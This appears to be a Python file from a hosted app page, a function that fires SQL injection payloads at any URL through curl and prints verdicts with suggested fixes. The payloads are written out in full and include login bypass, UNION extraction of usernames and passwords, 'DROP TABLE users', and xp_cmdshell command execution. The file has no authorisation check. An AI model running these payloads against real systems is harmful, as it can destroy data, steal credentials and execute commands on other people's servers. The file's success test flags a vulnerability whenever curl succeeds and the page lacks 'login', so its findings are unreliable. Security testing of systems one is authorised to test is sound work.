Spaces:
Sleeping
Sleeping
File size: 3,571 Bytes
e5ec528 73fbf60 524f6b0 e5ec528 73fbf60 e5ec528 524f6b0 e5ec528 73fbf60 e5ec528 524f6b0 e5ec528 a9920f9 73fbf60 7ed9a89 73fbf60 18fdeb9 524f6b0 73fbf60 524f6b0 73fbf60 524f6b0 73fbf60 524f6b0 2a1680b 524f6b0 18fdeb9 a9920f9 524f6b0 2a1680b 524f6b0 a9920f9 524f6b0 a9920f9 2a1680b 73fbf60 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 |
import subprocess
import urllib.parse
import os
def run_sqlmap(url: str):
"""
Test for SQL Injection vulnerabilities and provide explanations.
Args:
url (str): The URL to test.
Returns:
tuple: Test results as a string and the path to the results file.
"""
try:
url = url.strip()
if not url.startswith(('http://', 'https://','www.')):
return "Invalid URL: Must start with http:// or https:// or www.", None
payloads = [
("' OR '1'='1 --", "Bypass login with always-true condition."),
("' UNION SELECT null, username, password FROM users --", "Extract user credentials via UNION SELECT."),
("'; DROP TABLE users; --", "Attempt to delete the users table."),
("' OR 'a'='a", "Bypass login with simple true condition."),
("'; EXEC xp_cmdshell('dir') --", "Execute system command on the server."),
("' AND 1=0 UNION ALL SELECT NULL, version(), current_user --", "Retrieve DB version and current user."),
]
results = ""
for payload, purpose in payloads:
encoded_payload = urllib.parse.quote(payload)
full_url = f"{url}?id={encoded_payload}"
command = ['curl', '-X', 'GET', full_url]
result = subprocess.run(command, capture_output=True, text=True)
success = "✅" if result.returncode == 0 and "login" not in result.stdout.lower() else "❌"
results += f"{success} Payload: {payload}\n"
results += f"Purpose: {purpose}\n"
if success == "✅":
results += "Result: Potential vulnerability detected!\n"
else:
results += "Result: No vulnerability detected for this payload.\n"
results += "\nResponse Preview:\n" + result.stdout[:200] + "...\n\n"
# Explain the issue and potential fixes
if success == "✅":
results += "Explanation: The server responded positively to the payload, suggesting a possible vulnerability.\n"
if "1'='1" in payload:
results += "Issue: SQL injection allows login bypass.\n"
results += "Fix: Use prepared statements or ORM libraries to prevent SQL injection. Validate and sanitize user inputs.\n"
elif "DROP TABLE" in payload:
results += "Issue: SQL injection can delete critical tables.\n"
results += "Fix: Apply strict database permissions and input filtering.\n"
elif "xp_cmdshell" in payload:
results += "Issue: Remote code execution.\n"
results += "Fix: Disable dangerous SQL functions and limit server privileges.\n"
else:
results += "Issue: Data leakage or server exploitation.\n"
results += "Fix: Use Web Application Firewalls (WAFs) and keep software up to date.\n"
results += "\n"
# Save results to a file
output_file = "./sql_injection_result.html"
with open(output_file, "w") as file:
file.write(f"<html><body><pre>{results}</pre></body></html>")
return results, output_file
except Exception as e:
error_message = f"Error running SQL Injection test: {str(e)}"
error_file = "./sql_injection_error.txt"
with open(error_file, "w") as file:
file.write(error_message)
return error_message, error_file |